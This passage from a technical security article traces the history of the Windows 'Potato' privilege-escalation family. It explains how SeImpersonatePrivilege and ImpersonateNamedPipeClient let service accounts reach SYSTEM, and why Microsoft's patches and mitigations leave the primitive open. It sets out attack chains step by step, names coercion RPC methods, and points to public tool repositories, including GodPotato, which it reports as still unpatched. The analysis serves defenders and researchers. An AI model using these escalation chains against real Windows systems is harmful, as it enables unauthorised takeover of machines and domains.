&lt;td&gt;none for &lt;code&gt;SecurityIdentification&lt;/code&gt; or &lt;code&gt;SecurityAnonymous&lt;/code&gt;; for higher levels, either &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt;, or the token was created with explicit credentials via &lt;code&gt;LogonUser&lt;/code&gt;/&lt;code&gt;LsaLogonUser&lt;/code&gt; from within the caller&apos;s logon session, or the authenticated identity is the same as the caller (see [@ms-learn-impersonatenamedpipeclient])&lt;/td&gt;
&lt;td&gt;connected pipe handle&lt;/td&gt;
&lt;td&gt;impersonation token on thread&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;none (caller must already hold the token)&lt;/td&gt;
&lt;td&gt;token handle&lt;/td&gt;
&lt;td&gt;impersonation token on thread&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SetThreadToken&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;depends on token level&lt;/td&gt;
&lt;td&gt;token handle&lt;/td&gt;
&lt;td&gt;impersonation token on thread&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;DuplicateTokenEx&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;source token&lt;/td&gt;
&lt;td&gt;new token, type/level adjustable&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CreateProcessWithTokenW&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;&lt;code&gt;SeImpersonatePrivilege&lt;/code&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;primary token + command line&lt;/td&gt;
&lt;td&gt;new process&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CreateProcessAsUser&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;&lt;code&gt;SeAssignPrimaryTokenPrivilege&lt;/code&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;primary token + command line&lt;/td&gt;
&lt;td&gt;new process&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

flowchart LR
    Process[&quot;Process, holds primary token&quot;]
    Thread[&quot;Thread, optional impersonation token&quot;]
    NewProc[&quot;New process, spawned with chosen primary token&quot;]
    Process -- &quot;OpenProcessToken, read&quot; --&amp;gt; TH[&quot;Token handle&quot;]
    TH -- &quot;SetThreadToken or ImpersonateLoggedOnUser&quot; --&amp;gt; Thread
    Thread -- &quot;GetThreadToken&quot; --&amp;gt; TH
    TH -- &quot;DuplicateTokenEx, impersonation to primary&quot; --&amp;gt; PT[&quot;Primary token handle&quot;]
    PT -- &quot;CreateProcessWithTokenW, gated on SeImpersonatePrivilege&quot; --&amp;gt; NewProc
    Pipe[&quot;Connected named pipe&quot;] -- &quot;ImpersonateNamedPipeClient, gated on SeImpersonatePrivilege beyond SecurityIdentification&quot; --&amp;gt; Thread
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The five-API surface decomposes cleanly into two halves. &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; is the kernel-side &lt;em&gt;gate&lt;/em&gt; that decides whether a process can substitute an arbitrary primary token into a new process. &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt; is the user-mode &lt;em&gt;source&lt;/em&gt; that provides the token in the first place. Closing one half closes the surface. Closing neither half is the choice Microsoft has shipped for twenty years.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So how do you get a SYSTEM-context Windows process to authenticate to a pipe you control? Cesar Cerrudo asked that question in 2008 -- and his answer was just the first of five.&lt;/p&gt;
&lt;h2&gt;4. Five Generations of Token Sources, One Constant Privilege&lt;/h2&gt;
&lt;p&gt;Cesar Cerrudo had the privilege figured out in April 2008. So why did it take until January 2016 for HotPotato to make the chain pushbutton, until August 2018 for JuicyPotato to industrialise it, and until December 2022 for GodPotato to bypass the most aggressive DCOM hardening Microsoft has shipped? Because every generation answered the same question -- &lt;em&gt;where do the tokens come from?&lt;/em&gt; -- differently, and Microsoft patched each token source one at a time.&lt;/p&gt;
&lt;p&gt;This section is &lt;em&gt;generation-level&lt;/em&gt;. The variant-by-variant chronology of every named Potato lives in the &lt;a href=&quot;https://paragmali.com/blog/system-in-ten-seconds-how-the-potato-family-survived-every-m/&quot; rel=&quot;noopener&quot;&gt;sibling Potato Family article&lt;/a&gt; (2026-05-31); here, variants appear only as evidence for claims about the primitive.&lt;/p&gt;
&lt;h3&gt;4.1 Generation 1, direct token theft (2008-2010)&lt;/h3&gt;
&lt;p&gt;Cerrudo&apos;s HITB Dubai 2008 paper, &lt;em&gt;Token Kidnapping&lt;/em&gt;, named the privilege and named the technique [@cerrudo-2008-pdf]. The chain ran inside an MSSQL or IIS process and looked like this: enumerate processes the service account could open; find a thread that was already impersonating a higher-privileged token (typically leaked by some service-startup path); &lt;code&gt;DuplicateTokenEx&lt;/code&gt; that token; &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; to spawn &lt;code&gt;cmd.exe&lt;/code&gt; under the new identity. Two years later, at DEF CON 18, Cerrudo presented &lt;em&gt;Token Kidnapping&apos;s Revenge&lt;/em&gt; with fresh examples and a community-canonical title for the technique [@cerrudo-2010-defcon].&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s response was MS09-012 in April 2009 (community-known as the &lt;em&gt;Chimichurri&lt;/em&gt; fix, after Cesar Cerrudo&apos;s PoC of the same name shipped by Argeniss alongside the disclosure [@webarchive-argeniss-chimichurri; @forshaw-2020-01-empirical-wsh]). The MSRC blog post announcing the bulletin is unusually clear about what it closed and what it deliberately did not:&lt;/p&gt;

An attacker can escalate their privileges on a system if they can control the SeImpersonatePrivilege token. An attacker would need to be executing code in the context of a Windows service to use this exploit. -- MSRC blog, April 14, 2009 [@msrc-blog-2009-04-token-kidnapping]
&lt;p&gt;The MSRC text continues: &quot;the first update addresses service isolation, while the second addresses processes running as service accounts&quot; [@msrc-blog-2009-04-token-kidnapping]. &lt;em&gt;Service isolation&lt;/em&gt;, not the privilege itself. The bulletin closed the specific handle-leak surface Cerrudo had used -- it did not revoke &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; from NETWORK SERVICE, did not modify &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt;, did not modify &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt;. The MSRC acknowledged on the record that the privilege was sufficient for the escalation and elected to fix the &lt;em&gt;symptom&lt;/em&gt; (the leak surface), not the &lt;em&gt;gate&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;This is the supersession pattern that every subsequent generation follows: Microsoft patches the current token source; the next generation finds a new one within months.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Chimichurri&lt;/em&gt; (sometimes &lt;code&gt;Chimichurri.exe&lt;/code&gt;) is not a Microsoft codename. It is the name Cesar Cerrudo gave to the PoC exploit Argeniss released alongside the MS09-012 bulletin, hosted at the time at &lt;code&gt;argeniss.com/research/Chimichurri_CesarCerrudo.zip&lt;/code&gt; and preserved in the Internet Archive [@webarchive-argeniss-chimichurri]. Microsoft&apos;s own naming for the bulletin is simply MS09-012 / KB959454. Offensive-research convention has used &quot;Chimichurri&quot; as shorthand for the Cerrudo PoC ever since -- never for a Microsoft internal codename. Forshaw&apos;s January 2020 service-hardening retrospective references the same Cerrudo / Argeniss lineage [@forshaw-2020-01-empirical-wsh].&lt;/p&gt;
&lt;p&gt;Cerrudo presented the 2008 paper under his Argeniss affiliation and the 2010 DEF CON talk under IOActive [@cerrudo-2008-pdf; @cerrudo-2010-defcon]. The affiliation change occasionally trips up archival cross-referencing -- the work is the same lineage.&lt;/p&gt;
&lt;h3&gt;4.2 Generation 2, local NTLM cross-protocol reflection (2014-2016)&lt;/h3&gt;
&lt;p&gt;In December 2014, James Forshaw filed Project Zero Issue 222 -- a WebDAV-to-SMB local NTLM reflection that turned the Windows authentication redirector into a self-service token source. Stephen Breen&apos;s &lt;em&gt;HotPotato&lt;/em&gt; (January 16, 2016) used a related local-NTLM-relay primitive to deliver the first end-to-end service-account-to-SYSTEM chain that did not depend on finding a leaked token handle [@breen-2016-hot-potato]. Breen credits the genealogy openly: &quot;If this sounds vaguely familiar, it&apos;s because a similar technique was disclosed by the guys at Google Project Zero . . . In fact, some of our code was shamelessly borrowed from their PoC and expanded upon&quot; [@breen-2016-hot-potato].&lt;/p&gt;
&lt;p&gt;The conceptual leap is the one every subsequent generation depends on. Cerrudo&apos;s G1 had to &lt;em&gt;find&lt;/em&gt; a high-privileged token leaked into the local process tree; Breen&apos;s G2 &lt;em&gt;makes the system hand you one&lt;/em&gt; by coercing it to authenticate. The system itself becomes the token source. Forshaw articulated this generalisation explicitly in the 2021 Project Zero retrospective on the entire lineage [@forshaw-2021-10-relaying-dcom-pz].&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s response was MS16-075 (the SMB-side fix) and a handful of WPAD-hardening rollups. The chain became fragile and stopped being pushbutton -- but, again, none of these changes touched &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; or &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;4.3 Generation 3, local DCOM activation (2016-2018)&lt;/h3&gt;
&lt;p&gt;Within months of HotPotato, the community converged on a more reliable coercion primitive: a forged DCOM &lt;code&gt;OBJREF&lt;/code&gt; marshalled with an attacker-chosen OXID resolver. The trick induces a SYSTEM-context COM server to authenticate to a named pipe the attacker controls. Forshaw had reported the underlying primitive at Project Zero in 2015 as Issue 325, fixed as CVE-2015-2370 [@nvd-cve-2015-2370], but as his 2021 retrospective notes:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;The technique to locally relay authentication for DCOM was something I originally reported back in 2015 (issue 325). This issue was fixed as CVE-2015-2370, however the underlying authentication relay using DCOM remained. This was repurposed and expanded upon by various others for local and remote privilege escalation in the RottenPotato series of exploits, the latest in that line being RemotePotato which is currently unpatched as of October 2021.&quot; [@forshaw-2021-10-relaying-dcom-pz]&lt;/p&gt;
&lt;/blockquote&gt;

The DCOM service that maps an OXID (Object Exporter Identifier) to the RPC binding string a client uses to call methods on a marshalled COM object. The &quot;Rotten&quot; and &quot;Juicy&quot; Potato families forge `OBJREF` marshalled blobs in which the OXID resolver field points back at an attacker-controlled endpoint, causing the SYSTEM-context RPCSS to authenticate to the attacker&apos;s pipe when it tries to resolve the OXID.
&lt;p&gt;RottenPotato (September 26, 2016) demonstrated the chain [@foxglove-2016-09-rotten-potato]; JuicyPotato (July 2018) industrialised it with a configurable CLSID table and reliable pipe handling. The canonical mirror for the JuicyPotato repository is the &lt;code&gt;ohpe/juicy-potato&lt;/code&gt; GitHub project [@ohpe-juicy-potato-repo]. Crucially, the load-bearing API was still &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt; -- the DCOM trick is just the &lt;em&gt;vehicle&lt;/em&gt; that delivers a SYSTEM-context authentication to the attacker&apos;s pipe.&lt;/p&gt;
&lt;h3&gt;4.4 Generation 4, coercion APIs beyond DCOM (2020-2024)&lt;/h3&gt;
&lt;p&gt;Clement Labro (itm4n) shipped PrintSpoofer on May 1, 2020 [@labro-2020-printspoofer-post; @itm4n-printspoofer-repo]. The coercion primitive was MS-RPRN&apos;s &lt;code&gt;RpcRemoteFindFirstPrinterChangeNotificationEx&lt;/code&gt; -- an RPC method on the Print Spooler that takes an attacker-supplied UNC-like notification target and authenticates to it under the Spooler&apos;s SYSTEM identity. PrintSpoofer needed neither DCOM nor any leaked handle; the coercion primitive lived inside a always-running Windows service.&lt;/p&gt;
&lt;p&gt;PrintSpoofer generalised. Researchers quickly mapped a family of Windows RPC interfaces with the same shape -- an RPC method that takes an attacker-supplied path and resolves it server-side under a privileged identity. MS-EFSR (the Encrypting File System remote protocol) gave EfsPotato and SharpEfsPotato -- the canonical fork is &lt;code&gt;bugch3ck/SharpEfsPotato&lt;/code&gt; [@bugch3ck-sharpefspotato-repo], not the &lt;code&gt;ly4k&lt;/code&gt; mirror. MS-FSRVP, MS-DFSNM, and a long tail followed. CoercedPotato&apos;s &lt;code&gt;--interface {ms-rprn, ms-efsr}&lt;/code&gt; switch operationalises the enumeration in a single tool [@prepouce-coercedpotato-repo]; the project&apos;s MS-EFSR catalogue alone lists fourteen entry points (indices 0-13, with two marked NOT WORKING).&lt;/p&gt;
&lt;p&gt;The pattern is clear at this point: the privilege is the constant; the coercion primitive is interchangeable. Microsoft has shipped per-CVE patches for individual coercion APIs (the &lt;a href=&quot;https://paragmali.com/blog/three-years-of-printnightmare-how-the-oldest-windows-service/&quot; rel=&quot;noopener&quot;&gt;PrintNightmare cluster&lt;/a&gt; around MS-RPRN, anchored by CVE-2021-34527 [@nvd-cve-2021-34527]; targeted MS-EFSR fixes), but no commitment to enumerate or class-close the surface.&lt;/p&gt;
&lt;h3&gt;4.5 Generation 5, into RPCSS itself (2022-2024)&lt;/h3&gt;
&lt;p&gt;In December 2022, the researcher who goes by BeichenDream published GodPotato, with a README that names the structural defect plainly:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;Based on the history of Potato privilege escalation for 6 years, from the beginning of RottenPotato to the end of JuicyPotatoNG, I discovered a new technology by researching DCOM, which enables privilege escalation in Windows 2012 - Windows 2022, now as long as you have &lt;code&gt;ImpersonatePrivilege&lt;/code&gt; permission. Then you are &lt;code&gt;NT AUTHORITY\SYSTEM&lt;/code&gt; . . . There are some defects in rpcss when dealing with oxid, and rpcss is a service that must be opened by the system.&quot; [@beichendream-godpotato-readme]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;GodPotato survives every phase of CVE-2021-26414 (the three-phase DCOM hardening, rolled out 2021-06-08, 2022-06-14, 2023-03-14) [@nvd-cve-2021-26414] because the defect is in RPCSS&apos;s OXID &lt;em&gt;handling&lt;/em&gt;, not in DCOM &lt;em&gt;activation&lt;/em&gt;. The other structural half of the defect is documented by Forshaw in April 2020: &quot;When LSASS creates a Token for a new Logon session it stores that Token for later retrieval . . . in this case it does matter as it means that the negotiated Token on the server, which is the same machine, will actually be the session&apos;s Token, not the caller&apos;s Token&quot; [@forshaw-2020-04-sharing-logon-session]. Together those two structural properties keep GodPotato functional across the README&apos;s tested matrix -- Server 2012 through Server 2022, Windows 8 through Windows 11 -- and no public Microsoft patch has been issued for the underlying defect through mid-2026 [@beichendream-godpotato-readme].&lt;/p&gt;
&lt;p&gt;LocalPotato (February 2023) is the parallel branch: Antonio Cocomazzi and Andrea Pierini discovered that the NTLM Type-2 &quot;Reserved&quot; field could be used to swap context handles during local authentication, escalating from an &lt;em&gt;unprivileged&lt;/em&gt; user -- the first variant in the lineage that does not require &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; to start [@cocomazzi-pierini-2023-localpotato-post]. Microsoft fixed it as CVE-2023-21746 [@nvd-cve-2023-21746], but the conceptual proof remains: the local NTLM stack itself is an attacker-controllable token source.&lt;/p&gt;
&lt;p&gt;SilverPotato (April 24, 2024) extended the family across hosts [@pierini-2024-silverpotato-post]. Members of the Distributed COM Users or Performance Log Users groups trigger remote activation of the &lt;code&gt;sppui&lt;/code&gt; DCOM application (CLSID &lt;code&gt;{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}&lt;/code&gt;) on a target server. The coerced Domain Admin authentication is then chained through SMB relay to the &lt;a href=&quot;https://paragmali.com/blog/certified-pre-owned-ad-cs-and-active-directorys-second-trust/&quot; rel=&quot;noopener&quot;&gt;ADCS host&lt;/a&gt;, SAM dump, &lt;a href=&quot;https://paragmali.com/blog/pass-the-hash-to-pass-the-prt-twenty-nine-years-of-windows-c/&quot; rel=&quot;noopener&quot;&gt;Pass-the-Hash&lt;/a&gt;, CA private key extraction, and ForgeCert to mint a Domain Admin certificate. Microsoft fixed SilverPotato as CVE-2024-38061 in the July 2024 Patch Tuesday [@nvd-cve-2024-38061]; the original researcher&apos;s credit was subsequently removed after a second-reporter overlap and an MSRC severity re-grading from &lt;em&gt;moderate&lt;/em&gt; to &lt;em&gt;important&lt;/em&gt; [@pierini-2024-silverpotato-post]. The structural primitive the chain exploits -- DCOM cross-session activation gated on Distributed COM Users / Performance Log Users group membership chained into a cross-host NTLM relay -- remains a per-CVE rather than a class-level close.&lt;/p&gt;
&lt;p&gt;FakePotato (CVE-2024-38100, July 2024 KB5040434) closed the ShellWindows DCOM activation path that Pierini disclosed; the patch shipped about a month &lt;em&gt;before&lt;/em&gt; the public disclosure [@nvd-cve-2024-38100; @pierini-2024-fakepotato-post].&lt;/p&gt;

James Forshaw&apos;s writing is, by some margin, the single most-cited body on the impersonation primitive in the offensive-research community. Four single-author primaries underpin most of this article: *The Art of Becoming TrustedInstaller* (2017-08) on Service-SID derivation [@forshaw-2017-08-trustedinstaller]; *Empirically Assessing Windows Service Hardening* (2020-01), the canonical empirical assessment of what the WSH stack actually closes and what it does not [@forshaw-2020-01-empirical-wsh]; *Sharing a Logon Session a Little Too Much* (2020-04), which documents the LSASS cached-token defect that GodPotato later weaponised [@forshaw-2020-04-sharing-logon-session]; and *Windows Exploitation Tricks: Relaying DCOM Authentication* (2021-10), the Project Zero retrospective that names the genealogy from Issue 325 to RemotePotato [@forshaw-2021-10-relaying-dcom-pz]. Forshaw&apos;s 2020-01 opening sentence is the line every defender quotes back: &quot;In the past few years there&apos;s been numerous exploits for service to system privilege escalation. Primarily they revolve around the fact that system services typically have impersonation privilege&quot; [@forshaw-2020-01-empirical-wsh].

flowchart TD
    G1[&quot;G1, 2008-2010, Cerrudo Token Kidnapping, leaked impersonation handles&quot;]
    G2[&quot;G2, 2014-2016, HotPotato, local NTLM WPAD reflection&quot;]
    G3[&quot;G3, 2016-2018, RottenPotato, JuicyPotato, DCOM OXID activation&quot;]
    G4[&quot;G4, 2020-2024, PrintSpoofer, CoercedPotato, non-DCOM RPC coercion&quot;]
    G5[&quot;G5, 2022-2024, GodPotato, LocalPotato, SilverPotato, RPCSS OXID and NTLM-loopback defects&quot;]
    Constant[&quot;SeImpersonatePrivilege plus ImpersonateNamedPipeClient, unchanged 2003 through 2026&quot;]
    G1 -- &quot;MS09-012, Cerrudo Chimichurri PoC&quot; --&amp;gt; G2
    G2 -- &quot;MS16-075 plus WPAD hardening&quot; --&amp;gt; G3
    G3 -- &quot;Win10 1809 OXID hardening, then CVE-2021-26414 three phases&quot; --&amp;gt; G4
    G4 -- &quot;Per-CVE coercion-API patches, PrintNightmare cluster&quot; --&amp;gt; G5
    G5 -- &quot;GodPotato unpatched, SilverPotato patched CVE-2024-38061, LocalPotato patched CVE-2023-21746, FakePotato patched CVE-2024-38100&quot; --&amp;gt; Open[&quot;Mid-2026 state, still functional via GodPotato and the coercion-API long tail&quot;]
    G1 --- Constant
    G2 --- Constant
    G3 --- Constant
    G4 --- Constant
    G5 --- Constant
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generation&lt;/th&gt;
&lt;th&gt;Years&lt;/th&gt;
&lt;th&gt;Token source&lt;/th&gt;
&lt;th&gt;Microsoft response&lt;/th&gt;
&lt;th&gt;Still works in 2026?&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;G1 Direct Token Theft (Cerrudo)&lt;/td&gt;
&lt;td&gt;2008-2010&lt;/td&gt;
&lt;td&gt;Leaked impersonation handles&lt;/td&gt;
&lt;td&gt;MS09-012 (Cerrudo &lt;em&gt;Chimichurri&lt;/em&gt; PoC)&lt;/td&gt;
&lt;td&gt;No (handle leaks closed)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G2 Local NTLM Reflection (HotPotato)&lt;/td&gt;
&lt;td&gt;2014-2016&lt;/td&gt;
&lt;td&gt;WPAD + HTTP-to-SMB reflection&lt;/td&gt;
&lt;td&gt;MS16-075 + WPAD hardening&lt;/td&gt;
&lt;td&gt;No (chain too fragile)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G3 DCOM Activation (Rotten/Juicy)&lt;/td&gt;
&lt;td&gt;2016-2018&lt;/td&gt;
&lt;td&gt;Coerced DCOM auth to attacker pipe&lt;/td&gt;
&lt;td&gt;Win10 1809 OXID + CVE-2021-26414&lt;/td&gt;
&lt;td&gt;Partial (some LTSC pins)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G4 Non-DCOM RPC Coercion (PrintSpoofer/Coerced)&lt;/td&gt;
&lt;td&gt;2020-2024&lt;/td&gt;
&lt;td&gt;MS-RPRN / MS-EFSR / MS-FSRVP coercion&lt;/td&gt;
&lt;td&gt;Per-CVE patches&lt;/td&gt;
&lt;td&gt;Yes (long tail)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G5 RPCSS OXID + NTLM-Loopback (GodPotato/Local/Silver)&lt;/td&gt;
&lt;td&gt;2022-2024&lt;/td&gt;
&lt;td&gt;RPCSS handling defect + cross-host NTLM relay&lt;/td&gt;
&lt;td&gt;None for GodPotato; CVE-2023-21746 for LocalPotato; CVE-2024-38061 for SilverPotato (July 2024)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes&lt;/strong&gt; (GodPotato unaddressed)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

Microsoft&apos;s umbrella term for the post-2003 stack of mitigations around the service-account population: Service SIDs, restricted tokens, write-restricted tokens, integrity levels for services, the SCM&apos;s per-service required-privileges list, and the LPAC variants for select Windows components. The hardening is real, but as section 7 establishes, Microsoft has elected not to treat WSH as a *security* boundary.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Eighteen years. Five generations. One privilege. The variable is the token source; the constant is the gate.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Each generation tells a story of an MSRC bulletin that closed a specific token source and a researcher who found a new one within months. But every generation also leaves the same three components in place: the privilege, the named-pipe coercion API, and Microsoft&apos;s choice not to close the family at its root. What if those three components, taken together, form a closed system?&lt;/p&gt;
&lt;h2&gt;5. The Three-Piece Theorem&lt;/h2&gt;
&lt;p&gt;The Potato lineage is not a collection of bugs. It is the consequence of a single architectural identity:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; + &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt; + the MSRC servicing-criteria carve-out = service-account-to-SYSTEM.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Each summand is individually documented. Each is individually shipped by Microsoft. Each is individually justified by a real engineering or product requirement. &lt;em&gt;Together they form a closed system that no point fix can break, because removing any one of them breaks a documented Windows behaviour shipped applications depend on.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This is the article&apos;s main contribution: re-frame the eighteen-year named-exploit lineage as the consequence of a documented three-piece architectural decision rather than as a series of bugs.&lt;/p&gt;
&lt;h3&gt;Component 1: the privilege&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; is enumerated in the privilege-constants table as &lt;code&gt;SE_IMPERSONATE_NAME&lt;/code&gt; [@ms-learn-privilege-constants] and is the subject of a dedicated security-policy page that lists default assignments [@ms-learn-impersonate-policy]. The LOCAL SERVICE and NETWORK SERVICE account documentation each enumerate it as &lt;code&gt;(enabled)&lt;/code&gt; in the default privilege set [@ms-learn-localservice; @ms-learn-networkservice].&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Cost of removal:&lt;/em&gt; every shipping RPC server that impersonates clients breaks; §7.1 walks through the production-Windows surface this affects in detail.&lt;/p&gt;
&lt;h3&gt;Component 2: the coercion API&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt; has shipped since Windows XP / Server 2003 [@ms-learn-impersonatenamedpipeclient]. It is the standard mechanism by which a Win32 RPC server picks up the identity of a connecting client to make per-user access checks. Deprecating it is not a question of swapping one API for another -- the Microsoft-recommended impersonation APIs (&lt;code&gt;RpcImpersonateClient&lt;/code&gt;, the LSA-side variants) ultimately compose into the same kernel-side token-substitution call.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Cost of removal:&lt;/em&gt; the named-pipe RPC server population that pre-dates the modern impersonation APIs breaks; §7.3 details the SMB-redirector, Print-Spooler, EFS-RPC, and broader Win32 ABI migration cost.&lt;/p&gt;
&lt;h3&gt;Component 3: the carve-out&lt;/h3&gt;

Microsoft&apos;s public policy document defining what counts as a security boundary, a security feature, and a defence-in-depth feature for servicing purposes. The two-question test is direct: &quot;Does the vulnerability violate the goal or intent of a security boundary or a security feature? Does the severity of the vulnerability meet the bar for servicing?&quot; If either answer is no, &quot;the vulnerability will be considered for the next version or release of Windows but will not be addressed through a security update or guidance&quot; [@msrc-windows-security-servicing-criteria].
&lt;p&gt;The &lt;a href=&quot;https://paragmali.com/blog/windows-security-boundaries-the-document-that-decides-what-g/&quot; rel=&quot;noopener&quot;&gt;MSRC Windows Security Servicing Criteria&lt;/a&gt; document [@msrc-windows-security-servicing-criteria] is the policy-level anchor. The operational articulation came at Troopers 24 from Pierini and Cocomazzi, who named the doctrine in three sentences anchored on the WSH-as-safety-not-security distinction [@pierini-cocomazzi-troopers24-talk]. §7 opens with the full quote and walks through its implications; for the three-piece theorem here, what matters is that the carve-out is &lt;em&gt;documented&lt;/em&gt; and &lt;em&gt;Microsoft-position-as-stated&lt;/em&gt;, not inferred from per-CVE behaviour.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Cost of removal:&lt;/em&gt; Microsoft commits to the per-CVE cadence becoming a structural-close cadence -- servicing every coercion API in the long tail, every NTLM-loopback edge case, every cross-session token confusion, on the same SLAs as kernel RCEs. The MSRC has explicitly declined to take on that workload [@msrc-windows-security-servicing-criteria].&lt;/p&gt;

&quot;if you have SeAssignPrimaryToken or SeImpersonate privilege, you are SYSTEM&quot; -- Andrea Pierini; &quot;a deliberately provocative shortcut obviously, but it&apos;s not far from the truth&quot; -- Clement Labro&apos;s gloss on the same line [@labro-2020-printspoofer-post]

flowchart TB
    Priv[&quot;SeImpersonatePrivilege, default-assigned to LOCAL SERVICE and NETWORK SERVICE.  Removing this breaks every service that impersonates clients.&quot;]
    API[&quot;ImpersonateNamedPipeClient, shipped since XP/Server 2003.  Removing this breaks every named-pipe RPC server.&quot;]
    Doctrine[&quot;MSRC servicing criteria: WSH is a safety boundary, not a security boundary.  Changing this commits Microsoft to a structural-close servicing cadence.&quot;]
    Center[&quot;Service-account to SYSTEM&quot;]
    Priv --&amp;gt; Center
    API --&amp;gt; Center
    Doctrine --&amp;gt; Center
&lt;p&gt;The original focus paragraph that seeded this article mentioned &quot;RBAC for services&quot; as one of Microsoft&apos;s mitigations. The Stage 0a focus-premise audit found this phrase to be non-standard Windows terminology and explicitly retracted it; Microsoft has never shipped a Windows-side RBAC architecture for services. Azure RBAC and Microsoft Entra RBAC are cloud-side authorisation systems and do not gate the local &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; at all. Section 6.6 returns to this retraction in full.&lt;/p&gt;
&lt;p&gt;If the primitive is a closed three-piece system, what has Microsoft actually shipped in the eighteen years since Cerrudo? Five containment mitigations -- each of which narrows the surface around the primitive without closing it.&lt;/p&gt;
&lt;h2&gt;6. Five Mitigations and the Surface None of Them Closes&lt;/h2&gt;
&lt;p&gt;Microsoft has not been idle. Over nineteen years of service hardening they have shipped Service SIDs, restricted tokens, the Less-Privileged AppContainer model, group Managed Service Accounts, and the three-phase DCOM hardening of CVE-2021-26414. Each closes a real surface. None of them closes the primitive. The pattern is too consistent to be accidental.&lt;/p&gt;
&lt;h3&gt;6.1 Service SID isolation (Vista, 2007)&lt;/h3&gt;
&lt;p&gt;Vista shipped per-service SIDs of the form &lt;code&gt;NT SERVICE\&amp;lt;name&amp;gt;&lt;/code&gt; -- a SID generated on the fly from the service&apos;s name and attached to the service-process token. Forshaw&apos;s &lt;em&gt;The Art of Becoming TrustedInstaller&lt;/em&gt; is the canonical reference for the derivation: &quot;The SID itself is generated on the fly as the SHA1 hash of the uppercase version of the service name&quot; [@forshaw-2017-08-trustedinstaller]. Service SIDs are also documented as part of the SCM service-security model [@ms-learn-service-security].&lt;/p&gt;

A SID of the form `NT SERVICE\` derived as the SHA1 hash of the uppercased service name. Service SIDs let an ACL grant access to a specific service without granting access to every service running under the same account. When `SERVICE_SID_TYPE_UNRESTRICTED` is configured, the Service SID is added to the service-process token as a regular group SID.
&lt;p&gt;&lt;em&gt;Closes:&lt;/em&gt; lateral movement between services sharing an account. A process for service A cannot, by Service SID alone, open files ACL&apos;d to service B&apos;s Service SID (&lt;code&gt;NT SERVICE\B&lt;/code&gt;), even though both run as NETWORK SERVICE.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Does NOT close:&lt;/em&gt; vertical movement to SYSTEM via NETWORK SERVICE. Forshaw&apos;s April 2020 &lt;em&gt;Sharing a Logon Session a Little Too Much&lt;/em&gt; documents the LSASS cached-token defect that underpins GodPotato: even with Service SIDs in place, the local logon session that LSASS retrieves for a same-machine authentication is the &lt;em&gt;session&apos;s&lt;/em&gt; token, not the &lt;em&gt;caller&apos;s&lt;/em&gt; token, which is exactly the structural property GodPotato weaponises [@forshaw-2020-04-sharing-logon-session].&lt;/p&gt;
&lt;h3&gt;6.2 Restricted and write-restricted service tokens (Vista 2007, backport via MS09-012)&lt;/h3&gt;
